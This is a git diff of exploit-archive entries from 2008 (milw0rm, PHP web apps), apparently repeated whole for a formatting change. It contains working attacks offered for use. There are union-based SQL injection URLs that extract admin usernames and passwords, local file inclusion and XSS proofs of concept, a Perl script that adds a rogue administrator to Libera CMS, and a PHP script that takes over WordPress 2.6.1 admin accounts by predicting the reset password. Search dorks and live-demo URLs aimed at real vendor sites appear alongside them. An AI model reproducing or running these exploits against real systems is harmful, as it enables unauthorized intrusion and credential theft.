- SQL Injection in "pics.php" in the "sid" parameter. - Cross Site Scripting in "pics.php" in the "sid" parameter. - Cross Site Scripting in "view.php" in the "a" parameter. - -###################### - 3. PoC -###################### - http://localhost/path/pics.php?sid=-1+union+select+database(),2,3,4,5,6,7,8,version(),10,11,12-- - http://localhost/path/pics.php?sid=[XSS] - http://localhost/path/view.php?a=[XSS] - -########################################################### - -# milw0rm.com [2008-09-09] +########################################################### +# +# ___ __ __ __ __ +# /\_ \ /\ \\ \ /\ \/\ \ +# ____\//\ \ \ \ \\ \ __ _ __ _\ \ \ \ \ ____ +# /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\ +# /\__, `\ \_\ \_\ \__ ,__\\> <\\> <\\ \ \_\ \/_/ /_ +# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\ +# \/___/ \/____/ \/_/ \//\/_///\/_/ \/_____/\/____/ +# +# security breakd0wn! 
+########################################################### +# +# Title: Availscript Photo Album (pics.php) Multiple Vulnerabilities +# Vendor: http://www.availscript.com/ +# Vulnerable Version: N/A +# Fix: N/A +# +########################################################### +# +# c0ntact: sl4x.xuz[at]gmail[dot]com +# d0rk: "muahaha" +# stop lammo +# +########################################################### + +###################### + 1. Information +###################### + With this script you can add pictures in categories create album or wallpaper website. + +###################### + 2. Vulnerabilities +###################### + SQL Injection in "pics.php" in the "sid" parameter. + Cross Site Scripting in "pics.php" in the "sid" parameter. + Cross Site Scripting in "view.php" in the "a" parameter. + +###################### + 3. PoC +###################### + http://localhost/path/pics.php?sid=-1+union+select+database(),2,3,4,5,6,7,8,version(),10,11,12-- + http://localhost/path/pics.php?sid=[XSS] + http://localhost/path/view.php?a=[XSS] + +########################################################### + +# milw0rm.com [2008-09-09] diff --git a/platforms/php/webapps/6412.txt b/platforms/php/webapps/6412.txt index 98217a22b..7199bbdc8 100755 --- a/platforms/php/webapps/6412.txt +++ b/platforms/php/webapps/6412.txt 
@@ -1,14 +1,14 @@
-Availscript Classmate Script Remote SQL Injection Vulnerability
-home script : http://www.availscript.com/classmate_script.php
-By : Stack
-befor execute exploit you need to register
-exploit
-site.il/script/viewprofile.php?p=-1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--
-site.il/script/viewprofile.php?p=-1%20union%20select%201,2,3,4,username,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--
-site.il/script/viewprofile.php?p=-1%20union%20select%201,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17--
-live demo
-username
-http://www.availscript.com/classmate/viewprofile.php?p=-1%20union%20select%201,2,3,4,username,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--
-http://www.availscript.com/classmate/viewprofile.php?p=-1%20union%20select%201,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17--
-
-# milw0rm.com [2008-09-09]
+Availscript Classmate Script Remote SQL Injection Vulnerability
+home script : http://www.availscript.com/classmate_script.php
+By : Stack
+befor execute exploit you need to register
+exploit
+site.il/script/viewprofile.php?p=-1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--
+site.il/script/viewprofile.php?p=-1%20union%20select%201,2,3,4,username,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--
+site.il/script/viewprofile.php?p=-1%20union%20select%201,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17--
+live demo
+username
+http://www.availscript.com/classmate/viewprofile.php?p=-1%20union%20select%201,2,3,4,username,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--
+http://www.availscript.com/classmate/viewprofile.php?p=-1%20union%20select%201,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17--
+
+# milw0rm.com [2008-09-09]
diff --git a/platforms/php/webapps/6413.txt b/platforms/php/webapps/6413.txt
index 5773bb21b..8d41d2bce 100755
--- a/platforms/php/webapps/6413.txt
+++ b/platforms/php/webapps/6413.txt
@@ -1,31 +1,31 @@
-############################################################################################################
-[+]Zanfi CMS lite / Jaw Portal free (index.php page) Multiple Local File Inclusion
-[+]Discovered by SirGod
-[+]MorTal TeaM
-[+]Greetz E.M.I.N.EM,Ras,Puscas_marin,ToxicBlood,HrN,Kemrayz,007m
-############################################################################################################
-
-[+] Dork : Powered by: Zanfi Solutions
-
-[+] Local File Inclusion
-
- PoC :
-
- http://[target]/[Path]index.php?flag=[Local File]%00
-
- Example :
-
- http://127.0.0.1/index.php?flag=../../../autoexec.bat%00
-
-
- PoC :
-
- http://[target]/[Path]/index.php?inc=[Local File]%00
-
- Example :
-
- http://127.0.0.1/index.php?inc=../../../autoexec.bat%00
-
-############################################################################################################
-
-# milw0rm.com [2008-09-10]
+############################################################################################################
+[+]Zanfi CMS lite / Jaw Portal free (index.php page) Multiple Local File Inclusion
+[+]Discovered by SirGod
+[+]MorTal TeaM
+[+]Greetz E.M.I.N.EM,Ras,Puscas_marin,ToxicBlood,HrN,Kemrayz,007m
+############################################################################################################
+
+[+] Dork : Powered by: Zanfi Solutions
+
+[+] Local File Inclusion
+
+ PoC :
+
+ http://[target]/[Path]index.php?flag=[Local File]%00
+
+ Example :
+
+ http://127.0.0.1/index.php?flag=../../../autoexec.bat%00
+
+
+ PoC :
+
+ http://[target]/[Path]/index.php?inc=[Local File]%00
+
+ Example :
+
+ http://127.0.0.1/index.php?inc=../../../autoexec.bat%00
+
+############################################################################################################
+
+# milw0rm.com [2008-09-10]
diff --git a/platforms/php/webapps/6416.txt b/platforms/php/webapps/6416.txt
index 3a1cf3218..c7b2ceae5 100755
--- a/platforms/php/webapps/6416.txt
+++ b/platforms/php/webapps/6416.txt 
@@ -1,59 +1,59 @@ -#!/usr/bin/perl - # ---------------------------------------------------------- - # Libera CMS <= 1.12 (Cookie) Remote SQL Injection Exploit - # Perl Exploit - Add a new admin with your credentials! - # Author: StAkeR - StAkeR[at]hotmail[dot]it - # ---------------------------------------------------------- - # Usage: perl http://localhost/cms StAkeR obscure - # ---------------------------------------------------------- - - use strict; - use LWP::UserAgent; - - my ($hostname,$username,$password) = @ARGV; - my $request = undef; - my $http_s = new LWP::UserAgent or die $!; - - $hostname = ($hostname =~ /^http:\/\/(.+?)$/) ? $ARGV[0] : banner(); - banner() unless $username and $password; - - $http_s->agent("Mozilla/4.5 [en] (Win95; U)"); - $http_s->timeout(1); - $http_s->default_header('Cookie' => "libera_staff_pass=' or '1=1"); - - $request = $http_s->post($hostname."/admin.php?action=add_user_process", - [ - username => $username, - password => $password, - password_again => $password, - email => 0, - su => 1, - submit => "Add+User" - ]); - - if($request->is_success) - { - if($request->content =~ /added successfully/i) - { - print "[+] Exploit Done!\n"; - print "[+] Added New Administrator:\n\n"; - print "[+] Username: ${username}\n"; - print "[+] Password: ${password}\n"; - } - else - { - print "[!] Exploit Failed!\n"; - print "[!] Site Not Vulnerable\n"; - } - } - - - sub banner - { - print "[+] Libera CMS <= 1.2 Remote SQL Injection Exploit (add new admin)\n"; - print "[+] Usage: perl exploit.pl [host] [username] [password]\n"; - print "[+] Example: perl exploit.pl http://localhost/cms StAkeR obscure\n\n"; - return exit; - } - -# milw0rm.com [2008-09-10] +#!/usr/bin/perl + # ---------------------------------------------------------- + # Libera CMS <= 1.12 (Cookie) Remote SQL Injection Exploit + # Perl Exploit - Add a new admin with your credentials! 
+ # Author: StAkeR - StAkeR[at]hotmail[dot]it + # ---------------------------------------------------------- + # Usage: perl http://localhost/cms StAkeR obscure + # ---------------------------------------------------------- + + use strict; + use LWP::UserAgent; + + my ($hostname,$username,$password) = @ARGV; + my $request = undef; + my $http_s = new LWP::UserAgent or die $!; + + $hostname = ($hostname =~ /^http:\/\/(.+?)$/) ? $ARGV[0] : banner(); + banner() unless $username and $password; + + $http_s->agent("Mozilla/4.5 [en] (Win95; U)"); + $http_s->timeout(1); + $http_s->default_header('Cookie' => "libera_staff_pass=' or '1=1"); + + $request = $http_s->post($hostname."/admin.php?action=add_user_process", + [ + username => $username, + password => $password, + password_again => $password, + email => 0, + su => 1, + submit => "Add+User" + ]); + + if($request->is_success) + { + if($request->content =~ /added successfully/i) + { + print "[+] Exploit Done!\n"; + print "[+] Added New Administrator:\n\n"; + print "[+] Username: ${username}\n"; + print "[+] Password: ${password}\n"; + } + else + { + print "[!] Exploit Failed!\n"; + print "[!] Site Not Vulnerable\n"; + } + } + + + sub banner + { + print "[+] Libera CMS <= 1.2 Remote SQL Injection Exploit (add new admin)\n"; + print "[+] Usage: perl exploit.pl [host] [username] [password]\n"; + print "[+] Example: perl exploit.pl http://localhost/cms StAkeR obscure\n\n"; + return exit; + } + +# milw0rm.com [2008-09-10] diff --git a/platforms/php/webapps/6417.txt b/platforms/php/webapps/6417.txt index c1486f5f0..d06238e2b 100755 --- a/platforms/php/webapps/6417.txt +++ b/platforms/php/webapps/6417.txt 
@@ -1,62 +1,62 @@ - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - -<> Found by : Cyb3r-1sT - -<> C0ntact : cyb3r-1st [at] hotmail.com - -<> Groups : InjEctOr5 T3am - - -======================================================= -++++++++++++++++++++ Script information++++++++++++++++++++++ -======================================================= - - -<<->> script : Availscript Jobs Portal Script - -<<->> script site : www.availscript.com - - - -======================================================= -++++++++++++++++++++++++ Exploit +++++++++++++++++++++++++ -======================================================= - - -<<->> D0rk : find it - -<<->> Exploit :>>> - - >>>> www.site.me/job_seeker/applynow.php?jid=-99999+union+select+0,01,concat(username,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+admin-- - - - -======================================================= -+++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ -======================================================= - - -<<->> InjEctOr5 TeaM :: InjEctOr $ haker-b0y $ Mr.Dangers $ Eng.Silent Night $ QalbHamad $ fisher762 $ Sp1d3r_N3T $ ToTaL $ z3rO s3v3n $ RooT-Hacker - -<<->> Best Team : Then TrYaG Te4m & there Forum - -<<->> My best old freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ br1ght-dark $ Golden-zero - -<<->> All muslims - -# 
milw0rm.com [2008-09-10] + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + +<> Found by : Cyb3r-1sT + +<> C0ntact : cyb3r-1st [at] hotmail.com + +<> Groups : InjEctOr5 T3am + + +======================================================= +++++++++++++++++++++ Script information++++++++++++++++++++++ +======================================================= + + +<<->> script : Availscript Jobs Portal Script + +<<->> script site : www.availscript.com + + + +======================================================= +++++++++++++++++++++++++ Exploit +++++++++++++++++++++++++ +======================================================= + + +<<->> D0rk : find it + +<<->> Exploit :>>> + + >>>> www.site.me/job_seeker/applynow.php?jid=-99999+union+select+0,01,concat(username,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+admin-- + + + +======================================================= ++++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ +======================================================= + + +<<->> InjEctOr5 TeaM :: InjEctOr $ haker-b0y $ Mr.Dangers $ Eng.Silent Night $ QalbHamad $ fisher762 $ Sp1d3r_N3T $ ToTaL $ z3rO s3v3n $ RooT-Hacker + +<<->> Best Team : Then TrYaG Te4m & there Forum + +<<->> My best old freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ br1ght-dark $ Golden-zero + +<<->> All muslims 
+ +# milw0rm.com [2008-09-10] diff --git a/platforms/php/webapps/6421.php b/platforms/php/webapps/6421.php index 87e6b54df..d50495b76 100755 --- a/platforms/php/webapps/6421.php +++ b/platforms/php/webapps/6421.php 
@@ -1,155 +1,155 @@ -#!/usr/bin/php -=5.2.1 you'll need to be as well, in case -# server is <5.2.1, your php also needs to be below. -# to make sure it works you'll need the exact same version! -# also, mod_php works better than (f)cgi.. -# (this is a first working version - not a very reliable one) -# -# you should create rainbow tables to make this work in a -# real world scenario: -# php-5.2.0/php createtables.php > wp261_php520 -# php-5.2.1/php createtables.php > wp261_php521 -# -#------------------------------------------------------------- - - $BLOG = $_SERVER['argv'][1]; - - echo "[+] w0rdpress 2.6.1. admin takeover, iso 0808\n"; - - if(!$BLOG) { - echo "[!] Usage: ".$_SERVER['argv'][0]." blogurl\n"; - echo " fe: ".$_SERVER['argv'][0]." http://31337.biz/blog\n"; - exit; - } - - $UA = "WordpressAdminTakeover"; - $MBOX="wp".`ps|md5sum|head -c 8`; - $EMAIL="$MBOX@nospamfor.us"; - - echo (file_exists('wp261_php520') && file_exists('wp261_php521')) ? - "[X] rainbow tables available\n" : - "[!] rainbow tables not found - this will be really slow\n"; - - set_time_limit(0); - ini_set("max_execution_time",0); - ini_set("default_socket_timeout",20); - - if(!preg_match('!http://([^/]+)(.*)$!', $BLOG, $match)) { - die("[!] $BLOG is no valid URL\n"); - } - - $HOST = $match[1]; - $PATH = $match[2]; - if(!$PATH) $PATH='/'; - - echo "[-] registering new admin user\n"; - $suck = fsockopen($HOST, 80) or die("[!] could not connect to $HOST:80\n"); - $data = "user_login=admin".str_repeat("%20",60)."x&user_email=$EMAIL"; - $req = "POST $PATH/wp-login.php?action=register HTTP/1.1\r\nHost: $HOST\r\nUser-Agent: $UA\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data)."\r\n\r\n".$data; - fputs($suck, $req); - sleep(1); - fclose($suck); - - echo "[-] requesting resetlink and mail to '$EMAIL'\n"; - $suck = fsockopen($HOST, 80) or die("[!] 
could not connect to $HOST:80\n"); - $data="user_login=$EMAIL&wp-submit=Get+New+Password"; - $req = "POST $PATH/wp-login.php?action=lostpassword HTTP/1.1\r\nHost: $HOST\r\nReferer: $BLOG/wp-login.php?action=lostpassword\r\nConnection: keep-alive\r\nKeep-Alive: 300\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data)."\r\n\r\n".$data."\r\n"; - fputs($suck, $req); - - echo "[.] giving $BLOG some time to deliver mail..\n"; - for($i=0;$i<8;$i++) { - fputs($suck,"GET / HTTP/1.1\r\nHost: $HOST\r\nConnection: keep-alive\r\nKeep-Alive: 300\r\n\r\n"); - sleep(2); - } - - echo "[-] fetching resetlink token $MBOX\n"; - $PAGE = file_get_contents("http://www.nospamfor.us/mailbox.php?mailbox=$MBOX&sitename=nospamfor.us"); - if(!preg_match('/.+mailid=(\d+).+?Reset/s', $PAGE, $match)) die("[!] failed to find resetmail try raising the wait-time right above\n"); - $MAILID=$match[1]; - - echo "[-] fetching resetmail $MAILID\n"; - - $WHOLEMAIL=file_get_contents("http://www.nospamfor.us/mail.php?mailid=$MAILID&sitename=nospamfor.us&mailbox=$MBOX"); - if(!preg_match('/key=([A-z0-9]+)/', $WHOLEMAIL, $match)) die("[!] could not find resetkey in $WHOLEMAIL\n"); - $KEY=$match[1]; - - echo "[X] found resetkey $KEY\n"; - echo "[-] resetting password\n"; - - $req = "GET $PATH/wp-login.php?action=rp&key=$KEY HTTP/1.1\r\nHost: $HOST\r\nUser-Agent:$UA\r\nConnection: close\r\n\r\n"; - fputs($suck, $req); - while(!feof($suck)) { - #echo "D:". - fgets($suck); - } - fclose($suck); - - echo "[-] calculating password\n"; - $SEED=false; - if(file_exists('wp261_php520')) { - $SEED=`grep -F $KEY wp261*|cut -d : -f 1`; - echo "[X] got seed $SEED from rainbow table\n"; - } - $PASSWORD=calcpass($KEY, $SEED); - - echo "[X] all done."; - exit; - - function calcpass($resetkey, $seed = false) { - mt_srand(2); $a = mt_rand(); mt_srand(3); $b = mt_rand(); - define('BUGGY', $a == $b); - echo "[-] wpress password computation. runnig in ".(BUGGY?'fast':'slow')." 
mode\n"; - - echo "[+] got key $resetkey via mail\n"; - - if(!$seed) $seed = getseed($resetkey); - - if($seed===false) die("[!] seed not found :( try using identical php version (< 5.2.5)\n"); - - mt_srand($seed); - echo "[-] seed for key ".wp_generate_password(20,false)." is $seed\n"; - $pass = wp_generate_password(); - echo "[+] new credentials are admin:$pass\n"; - return $pass; - } - - function wp_generate_password($length = 12, $special_chars = true) { - $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; - if ( $special_chars ) - $chars .= '!@#$%^&*()'; - - $password = ''; - for ( $i = 0; $i < $length; $i++ ) - $password .= substr($chars, mt_rand(0, strlen($chars) - 1), 1); - return $password; - } - - function getseed($resetkey) { - echo "[-] calculating rand seed for $resetkey (this will take a looong time)"; - $max = pow(2,(32-BUGGY)); - for($x=0;$x<=$max;$x++) { - $seed = BUGGY ? ($x << 1) + 1 : $x; - mt_srand($seed); - $testkey = wp_generate_password(20,false); - if($testkey==$resetkey) { echo "o\n"; return $seed; } - - if(!($x % 10000)) echo "."; - } - echo "\n"; - return false; - } - -?> - -# milw0rm.com [2008-09-10] +#!/usr/bin/php +=5.2.1 you'll need to be as well, in case +# server is <5.2.1, your php also needs to be below. +# to make sure it works you'll need the exact same version! +# also, mod_php works better than (f)cgi.. +# (this is a first working version - not a very reliable one) +# +# you should create rainbow tables to make this work in a +# real world scenario: +# php-5.2.0/php createtables.php > wp261_php520 +# php-5.2.1/php createtables.php > wp261_php521 +# +#------------------------------------------------------------- + + $BLOG = $_SERVER['argv'][1]; + + echo "[+] w0rdpress 2.6.1. admin takeover, iso 0808\n"; + + if(!$BLOG) { + echo "[!] Usage: ".$_SERVER['argv'][0]." blogurl\n"; + echo " fe: ".$_SERVER['argv'][0]." 
http://31337.biz/blog\n"; + exit; + } + + $UA = "WordpressAdminTakeover"; + $MBOX="wp".`ps|md5sum|head -c 8`; + $EMAIL="$MBOX@nospamfor.us"; + + echo (file_exists('wp261_php520') && file_exists('wp261_php521')) ? + "[X] rainbow tables available\n" : + "[!] rainbow tables not found - this will be really slow\n"; + + set_time_limit(0); + ini_set("max_execution_time",0); + ini_set("default_socket_timeout",20); + + if(!preg_match('!http://([^/]+)(.*)$!', $BLOG, $match)) { + die("[!] $BLOG is no valid URL\n"); + } + + $HOST = $match[1]; + $PATH = $match[2]; + if(!$PATH) $PATH='/'; + + echo "[-] registering new admin user\n"; + $suck = fsockopen($HOST, 80) or die("[!] could not connect to $HOST:80\n"); + $data = "user_login=admin".str_repeat("%20",60)."x&user_email=$EMAIL"; + $req = "POST $PATH/wp-login.php?action=register HTTP/1.1\r\nHost: $HOST\r\nUser-Agent: $UA\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data)."\r\n\r\n".$data; + fputs($suck, $req); + sleep(1); + fclose($suck); + + echo "[-] requesting resetlink and mail to '$EMAIL'\n"; + $suck = fsockopen($HOST, 80) or die("[!] could not connect to $HOST:80\n"); + $data="user_login=$EMAIL&wp-submit=Get+New+Password"; + $req = "POST $PATH/wp-login.php?action=lostpassword HTTP/1.1\r\nHost: $HOST\r\nReferer: $BLOG/wp-login.php?action=lostpassword\r\nConnection: keep-alive\r\nKeep-Alive: 300\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data)."\r\n\r\n".$data."\r\n"; + fputs($suck, $req); + + echo "[.] giving $BLOG some time to deliver mail..\n"; + for($i=0;$i<8;$i++) { + fputs($suck,"GET / HTTP/1.1\r\nHost: $HOST\r\nConnection: keep-alive\r\nKeep-Alive: 300\r\n\r\n"); + sleep(2); + } + + echo "[-] fetching resetlink token $MBOX\n"; + $PAGE = file_get_contents("http://www.nospamfor.us/mailbox.php?mailbox=$MBOX&sitename=nospamfor.us"); + if(!preg_match('/.+mailid=(\d+).+?Reset/s', $PAGE, $match)) die("[!] 
failed to find resetmail try raising the wait-time right above\n"); + $MAILID=$match[1]; + + echo "[-] fetching resetmail $MAILID\n"; + + $WHOLEMAIL=file_get_contents("http://www.nospamfor.us/mail.php?mailid=$MAILID&sitename=nospamfor.us&mailbox=$MBOX"); + if(!preg_match('/key=([A-z0-9]+)/', $WHOLEMAIL, $match)) die("[!] could not find resetkey in $WHOLEMAIL\n"); + $KEY=$match[1]; + + echo "[X] found resetkey $KEY\n"; + echo "[-] resetting password\n"; + + $req = "GET $PATH/wp-login.php?action=rp&key=$KEY HTTP/1.1\r\nHost: $HOST\r\nUser-Agent:$UA\r\nConnection: close\r\n\r\n"; + fputs($suck, $req); + while(!feof($suck)) { + #echo "D:". + fgets($suck); + } + fclose($suck); + + echo "[-] calculating password\n"; + $SEED=false; + if(file_exists('wp261_php520')) { + $SEED=`grep -F $KEY wp261*|cut -d : -f 1`; + echo "[X] got seed $SEED from rainbow table\n"; + } + $PASSWORD=calcpass($KEY, $SEED); + + echo "[X] all done."; + exit; + + function calcpass($resetkey, $seed = false) { + mt_srand(2); $a = mt_rand(); mt_srand(3); $b = mt_rand(); + define('BUGGY', $a == $b); + echo "[-] wpress password computation. runnig in ".(BUGGY?'fast':'slow')." mode\n"; + + echo "[+] got key $resetkey via mail\n"; + + if(!$seed) $seed = getseed($resetkey); + + if($seed===false) die("[!] seed not found :( try using identical php version (< 5.2.5)\n"); + + mt_srand($seed); + echo "[-] seed for key ".wp_generate_password(20,false)." 
is $seed\n"; + $pass = wp_generate_password(); + echo "[+] new credentials are admin:$pass\n"; + return $pass; + } + + function wp_generate_password($length = 12, $special_chars = true) { + $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; + if ( $special_chars ) + $chars .= '!@#$%^&*()'; + + $password = ''; + for ( $i = 0; $i < $length; $i++ ) + $password .= substr($chars, mt_rand(0, strlen($chars) - 1), 1); + return $password; + } + + function getseed($resetkey) { + echo "[-] calculating rand seed for $resetkey (this will take a looong time)"; + $max = pow(2,(32-BUGGY)); + for($x=0;$x<=$max;$x++) { + $seed = BUGGY ? ($x << 1) + 1 : $x; + mt_srand($seed); + $testkey = wp_generate_password(20,false); + if($testkey==$resetkey) { echo "o\n"; return $seed; } + + if(!($x % 10000)) echo "."; + } + echo "\n"; + return false; + } + +?> + +# milw0rm.com [2008-09-10] diff --git a/platforms/php/webapps/6422.txt b/platforms/php/webapps/6422.txt index 38783f88a..1ae9270e3 100755 --- a/platforms/php/webapps/6422.txt +++ b/platforms/php/webapps/6422.txt 
@@ -1,62 +1,62 @@ -################################################################ -# .___ __ _______ .___ # -# __| _/____ _______| | __ ____ \ _ \ __| _/____ # -# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # -# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # -# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # -# \/ \/ \/ # -# ___________ ______ _ __ # -# _/ ___\_ __ \_/ __ \ \/ \/ / # -# \ \___| | \/\ ___/\ / # -# \___ >__| \___ >\/\_/ # -# est.2007 \/ \/ forum.darkc0de.com # -################################################################ -# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # -# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE # -# and all darkc0de members ---# -################################################################ -# -# Author: r45c4l -# -# Home : www.darkc0de.com -# -# Email : r45c4l@hotmail.com -# -# Share the c0de! -# -################################################################ -# -# Title: phpVID 1.1 The video sharing script! Multiple Vulnerabilities -# -# Vendor: http://www.vastal.com/phpvid-the-video-sharing-software.html -# Vulnerable Version: 1.1 -# -########################################################### -# -# d0rk:Powered By Vastal I-Tech's phpVID. -# -# -########################################################### - - Vulnerabilities - - Blind SQL Injection in "groups.php" in the "cat" parameter. 
- Cross Site Scripting in "search_results.php" - - - POC: - http://www.site.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4 - http://www.site.com/search_results.php?query=[XSS] - - - Live Demo: - http://www.phpvid.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4 - http://www.phpvid.com/search_results.php?query= - - -########################################################### -# -# Bug discovered : 10 Sep.2008 -########################################################### - -# milw0rm.com [2008-09-10] +################################################################ +# .___ __ _______ .___ # +# __| _/____ _______| | __ ____ \ _ \ __| _/____ # +# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # +# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # +# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # +# \/ \/ \/ # +# ___________ ______ _ __ # +# _/ ___\_ __ \_/ __ \ \/ \/ / # +# \ \___| | \/\ ___/\ / # +# \___ >__| \___ >\/\_/ # +# est.2007 \/ \/ forum.darkc0de.com # +################################################################ +# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # +# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE # +# and all darkc0de members ---# +################################################################ +# +# Author: r45c4l +# +# Home : www.darkc0de.com +# +# Email : r45c4l@hotmail.com +# +# Share the c0de! +# +################################################################ +# +# Title: phpVID 1.1 The video sharing script! Multiple Vulnerabilities +# +# Vendor: http://www.vastal.com/phpvid-the-video-sharing-software.html +# Vulnerable Version: 1.1 +# +########################################################### +# +# d0rk:Powered By Vastal I-Tech's phpVID. +# +# +########################################################### + + Vulnerabilities + + Blind SQL Injection in "groups.php" in the "cat" parameter. 
+ Cross Site Scripting in "search_results.php" + + + POC: + http://www.site.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4 + http://www.site.com/search_results.php?query=[XSS] + + + Live Demo: + http://www.phpvid.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4 + http://www.phpvid.com/search_results.php?query= + + +########################################################### +# +# Bug discovered : 10 Sep.2008 +########################################################### + +# milw0rm.com [2008-09-10] diff --git a/platforms/php/webapps/6423.txt b/platforms/php/webapps/6423.txt index 1ab29cb9b..2e2050169 100755 --- a/platforms/php/webapps/6423.txt +++ b/platforms/php/webapps/6423.txt 
@@ -1,43 +1,43 @@ - ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ - + + - + Zanfi CMS lite / Jaw Portal free SQL Injection Vulnerability + - + + - + Discovered by Cru3l.b0y + - + + - + WwW.DeltaHacking.Net + - + + - + + - + + - ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ - - - -AUTHOR : Cru3l.b0y -DATE : 10 sep 2008 -SITE : WwW.DeltaHacking.Net - - -##################################################### -APPLICATION : Zanfi CMS lite / Jaw Portal free -DOWNLOAD : http://www.zanfi.nl/down.php?file=ZanfiCmsLite.rar -VENDOR : http://www.zanfi.nl/ -Dork : Powered by: Zanfi Solutions -##################################################### - - -[+] SQL : DBpAGE&pageid=-1'+union+select+version(),user()/* -[+] Exploit : http://[t4rg3t]/[p4th]/index.php?page=[SQL] - - - - -################################################################ -# Greetings: str0ke, Dr.Trojan, all member in DeltaHacking.Net # -################################################################ - - -WebSite: WwW.DeltaHacking.Net & WwW.w3bsecurity.iR - -Contact: Cru3l.b0y[at]gmail.com - -# milw0rm.com [2008-09-10] + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + + + Zanfi CMS lite / Jaw Portal free SQL Injection Vulnerability + + + + + + Discovered by Cru3l.b0y + + + + + + WwW.DeltaHacking.Net + + + + + + + + + + + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + +AUTHOR : Cru3l.b0y +DATE : 10 sep 2008 +SITE : WwW.DeltaHacking.Net + + +##################################################### +APPLICATION : Zanfi CMS lite / Jaw Portal free +DOWNLOAD : http://www.zanfi.nl/down.php?file=ZanfiCmsLite.rar +VENDOR : http://www.zanfi.nl/ +Dork : Powered by: Zanfi Solutions +##################################################### + + +[+] SQL : DBpAGE&pageid=-1'+union+select+version(),user()/* +[+] Exploit : http://[t4rg3t]/[p4th]/index.php?page=[SQL] + + + + 
